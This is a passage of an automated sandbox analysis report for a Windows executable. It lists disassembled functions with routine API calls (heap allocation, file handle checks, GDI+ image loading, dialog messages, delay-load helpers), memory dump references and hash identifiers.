                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 546d9f67184fd1a194467b694ca3e47ba25242136698f04c3c6d13551e372a7c
                • Instruction ID: 072ae40e374fbb93bce1013f574c7438991bba3faa8f343c187622343ebbfed2
                • Opcode Fuzzy Hash: 546d9f67184fd1a194467b694ca3e47ba25242136698f04c3c6d13551e372a7c
                • Instruction Fuzzy Hash: 3A71AE71104F44AEDB25DB74CC41AE7BBE8FB14301F44891EE59E87246DB32AA48EF12
                Function 0087837F Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                Download Yara Rule
                APIs
                • __EH_prolog.LIBCMT ref: 00878384
                  • Part of subcall function 00871380: __EH_prolog.LIBCMT ref: 00871385
                  • Part of subcall function 00871380: new.LIBCMT ref: 008713FE
                  • Part of subcall function 008719A6: __EH_prolog.LIBCMT ref: 008719AB
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 7d44fa9448794f8ef626f358d8a0fdf22c67d4e4f3abf8f36220df1601586486
                • Instruction ID: 1b906070a19457c721c02ba1cdb98bc17cc1e59846faba9373ae72981759b335
                • Opcode Fuzzy Hash: 7d44fa9448794f8ef626f358d8a0fdf22c67d4e4f3abf8f36220df1601586486
                • Instruction Fuzzy Hash: 9C41C4318406549ADF20EB64CC59BEA73A8FF10300F0480EAE58ED3496DFB49EC8DB51
                Function 00871E00 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                Download Yara Rule
                APIs
                • __EH_prolog.LIBCMT ref: 00871E05
                  • Part of subcall function 00873B3D: __EH_prolog.LIBCMT ref: 00873B42
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 91ce56df2f5d7cc3ca040d9ef7329c33cd02382371873bbbffff286425d40818
                • Instruction ID: 304bb51770d3e764faf59f16e7a96c0baaf916d74d57cd499da6b15e1312588d
                • Opcode Fuzzy Hash: 91ce56df2f5d7cc3ca040d9ef7329c33cd02382371873bbbffff286425d40818
                • Instruction Fuzzy Hash: D62139329041089FCF15EF9DD9459EEBBF6FF58300B10406DE849A7651CB329E10DB62
                Function 0088A7C3 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                Download Yara Rule
                APIs
                • __EH_prolog.LIBCMT ref: 0088A7C8
                  • Part of subcall function 00871380: __EH_prolog.LIBCMT ref: 00871385
                  • Part of subcall function 00871380: new.LIBCMT ref: 008713FE
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: c49f0fcbbd91c3c299a0e737d9932cbda8fbe2790ac19b697e2b7e51365b1f68
                • Instruction ID: 492d5e81f9870f8b4ea3090fff9f764b655b06104eec285eb4d165bef7fcfecc
                • Opcode Fuzzy Hash: c49f0fcbbd91c3c299a0e737d9932cbda8fbe2790ac19b697e2b7e51365b1f68
                • Instruction Fuzzy Hash: 53213D71C042499ADF15EF98C9525EEB7B4FF19304F1044AAE809E7242DB35AE06DB62
                Function 008792E6 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: c17f67d85ccd93d5cfbad9ee98d7c3857d31cfe8f2f3ad13eeb6390a0a74d869
                • Instruction ID: 5eecd1a3b3f3dcdd72d519252e335c5ef7f07a9f064ddea6fc841cfaa3e70ba9
                • Opcode Fuzzy Hash: c17f67d85ccd93d5cfbad9ee98d7c3857d31cfe8f2f3ad13eeb6390a0a74d869
                • Instruction Fuzzy Hash: 3E115E73A00528ABCF26AAACCC519EEB736FF88750F058119F85DF7255DA35CD1087A1
                Function 0087AA88 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                • Instruction ID: 63581a2c1b3c2621c7f68b2514271cee897a9b3063019236607f6bedc4b7d12d
                • Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                • Instruction Fuzzy Hash: 10F08C309047299FDB38DA78C941B2EB7E8FB51324F20C92AE49EC2694E770D880C742
                Function 00875BD7 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                Download Yara Rule
                APIs
                • __EH_prolog.LIBCMT ref: 00875BDC
                  • Part of subcall function 0087B07D: __EH_prolog.LIBCMT ref: 0087B082
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 81257f7a52026833c25eb99989f8a2cd56c4b659599b472f27be5872027e4017
                • Instruction ID: f7ee7509ff1ed68e38c5d10054a890135a5e95a70282d2ead017b665f34856d7
                • Opcode Fuzzy Hash: 81257f7a52026833c25eb99989f8a2cd56c4b659599b472f27be5872027e4017
                • Instruction Fuzzy Hash: 1A018B31A00684DAC724F7ACC0953DDFBA4EF19300F80909DA99E93283CBB01B08C663
                Function 00898518 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0089C13D,00000000,?,008967E2,?,00000008,?,008989AD,?,?,?), ref: 0089854A
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: a599d77ab6ec0a3727a3d38a95712188ce57b39870fc737f92dc3d89138e8503
                • Instruction ID: cc9ec33fc1bd749d937271e8cbbbbc31265e67d3995292bb831e6e5f9949075d
                • Opcode Fuzzy Hash: a599d77ab6ec0a3727a3d38a95712188ce57b39870fc737f92dc3d89138e8503
                • Instruction Fuzzy Hash: 77E0A921644627EAEF213B69AC01B9A3B88FB433A0F1E0220AC18E2080CE20CC0485A6
                Function 008796D0 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                Download Yara Rule
                APIs
                • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,0087968F,?,?,?,?,008A1FA1,000000FF), ref: 008796EB
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: ChangeCloseFindNotification
                • String ID:
                • API String ID: 2591292051-0
                • Opcode ID: b3237d05732c90ec310a9e12ff90fdec086aaaf4077988e397db3c7cc261ced8
                • Instruction ID: 7b8b5e3041065c96a34672e93e455df1cdc96e1a2e9cb314dc112923cc6735dc
                • Opcode Fuzzy Hash: b3237d05732c90ec310a9e12ff90fdec086aaaf4077988e397db3c7cc261ced8
                • Instruction Fuzzy Hash: 45F05E31596B058FDB308A24D548792B7E5FB22725F04DB1ED0EF839E4A761E84D8F10
                Function 0087A4C6 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                Download Yara Rule
                APIs
                • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0087A4F5
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: CloseFind
                • String ID:
                • API String ID: 1863332320-0
                • Opcode ID: 39ab8f8230ece34f842bf2d06d94c1e361851fe0cb0daf72906fd32a9ebe90ca
                • Instruction ID: 901ab6195131b20ecd1e3e0fc8a94da72e69b68b0fa302527e1b3265672ede9a
                • Opcode Fuzzy Hash: 39ab8f8230ece34f842bf2d06d94c1e361851fe0cb0daf72906fd32a9ebe90ca
                • Instruction Fuzzy Hash: A9F0B431009780AACA265BBC48047DABB91FF46321F04CA49F1FD82199C2B594C59723
                Function 0088067C Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                Download Yara Rule
                APIs
                • SetThreadExecutionState.KERNEL32(00000001), ref: 008806B1
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: ExecutionStateThread
                • String ID:
                • API String ID: 2211380416-0
                • Opcode ID: 42b8d684796c19201c5209f0d474d43704d9bdc5b1ab2489c8f9f3545c2bc756
                • Instruction ID: d26235f379a60896239a854ca96bb660c6424d3177ce042a8e0c034ec20eba6e
                • Opcode Fuzzy Hash: 42b8d684796c19201c5209f0d474d43704d9bdc5b1ab2489c8f9f3545c2bc756
                • Instruction Fuzzy Hash: 4DD0C22170421026DA21336CA8497FF1B0AFFC3710F080021B04DD37C69E4A489A4BA3
                Function 00889D7B Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON
                Download Yara Rule
                APIs
                • GdipAlloc.GDIPLUS(00000010), ref: 00889D81
                  • Part of subcall function 00889B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00889B30
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: Gdip$AllocBitmapCreateFromStream
                • String ID:
                • API String ID: 1915507550-0
                • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                • Instruction ID: d78999a7769f73cc94a7a416d065bc987413254dd6f6b415031fdc3fadafc4e1
                • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                • Instruction Fuzzy Hash: C9D0C73065420DBADF41BA759C02A7A7BE9FB00350F144175FC48D6151EF71DE20A766
                Function 00879989 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                Download Yara Rule
                APIs
                • GetFileType.KERNELBASE(000000FF,00879887), ref: 00879995
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: FileType
                • String ID:
                • API String ID: 3081899298-0
                • Opcode ID: 2f112228cb624012d636a16a0e0d88d344c2508b5fc54873a469504102023d7d
                • Instruction ID: 750d69f292582868fd53794313e1840cfa7b1e10c6a2ab67767666b99026d4de
                • Opcode Fuzzy Hash: 2f112228cb624012d636a16a0e0d88d344c2508b5fc54873a469504102023d7d
                • Instruction Fuzzy Hash: 93D01231011540959F2146354D09299BF51FB83376B38C6A8E1A9C40A9D723C803F541
                Function 0088D41A Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                Download Yara Rule
                APIs
                • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0088D43F
                  • Part of subcall function 0088AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0088AC85
                  • Part of subcall function 0088AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0088AC96
                  • Part of subcall function 0088AC74: IsDialogMessageW.USER32(000103EE,?), ref: 0088ACAA
                  • Part of subcall function 0088AC74: TranslateMessage.USER32(?), ref: 0088ACB8
                  • Part of subcall function 0088AC74: DispatchMessageW.USER32(?), ref: 0088ACC2
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: Message$DialogDispatchItemPeekSendTranslate
                • String ID:
                • API String ID: 897784432-0
                • Opcode ID: 2c87953fd63445c109f38259b4c5729ba16c2e7132ce619dbdba9c971a97dc9e
                • Instruction ID: d9b2ddb953886d42f8f96ceb05373907f2a8e76cbe56160d310bdb565ed144c1
                • Opcode Fuzzy Hash: 2c87953fd63445c109f38259b4c5729ba16c2e7132ce619dbdba9c971a97dc9e
                • Instruction Fuzzy Hash: F6D09E31144300ABDA162B55CE07F0F7BA6FB98B05F004655B348B40F28662AD20DB16
                Function 0088D891 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 50442064a29a60713f22a6004f34f59ee597cf4cba4044648b8c0bad91da475c
                • Instruction ID: ee6648522eb7c11f854962a090faad7858d80be8642e3277f455a8eab8fc83b0
                • Opcode Fuzzy Hash: 50442064a29a60713f22a6004f34f59ee597cf4cba4044648b8c0bad91da475c
                • Instruction Fuzzy Hash: 62B0129526C3017C350831546C52C3B031CF4C2B113308A3BB309E01C1D8406C4C5532
                Function 0088D8AC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 0fd9827994bb0318c3d6d51be702e9d09a993a1b5c297e2512f66234fe37c4d2
                • Instruction ID: b2228d555080c3ceb6288efb975171317c50c96e8eb78ada10300c536ab76b9e
                • Opcode Fuzzy Hash: 0fd9827994bb0318c3d6d51be702e9d09a993a1b5c297e2512f66234fe37c4d2
                • Instruction Fuzzy Hash: A0B0129526C3067C310871586C42D3B031CF4C3B11330852BB309D02C1D8406C081732
                Function 0088D8B6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 5a011271781bbf55227f5c25568f35ae0265fab80f828513b6752080397771f8
                • Instruction ID: 1f6dd185d9103e941573b2feb518a573e57a24c016eda8c9d9444db83137990e
                • Opcode Fuzzy Hash: 5a011271781bbf55227f5c25568f35ae0265fab80f828513b6752080397771f8
